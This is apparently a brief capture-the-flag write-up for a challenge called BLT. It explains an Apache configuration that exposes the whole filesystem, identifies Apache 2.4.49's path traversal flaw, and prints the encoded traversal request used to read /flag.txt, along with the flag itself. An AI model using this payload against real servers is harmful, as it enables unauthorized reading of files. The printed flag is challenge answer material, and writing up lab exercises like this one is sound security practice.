BLT
Last updated
Was this helpful?
Last updated
Was this helpful?
Our company provides services for the development of the most modern software.
Can you check our landing page for vulnerabilities?
Here's our website: 164.90.201.196:8080/
Taking a look at the Dockerfile, we quickly see a misconfiguration in the apache.conf
file.
Here, <Directory />
refers to the filesystem directory, not the web root. Hence, this configuration allows access to any file on the filesystem.
Taking a closer look a the server responses showed that the Apache server is on version 2.4.49, and vulnerable to a recent path traversal zero-day.
GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/flag.txt HTTP/1.1
allows us to get the flag at /flag.txt
.
The flag is spbctf{th3_lat3st_d03s_n0t_m3an_s3cur3}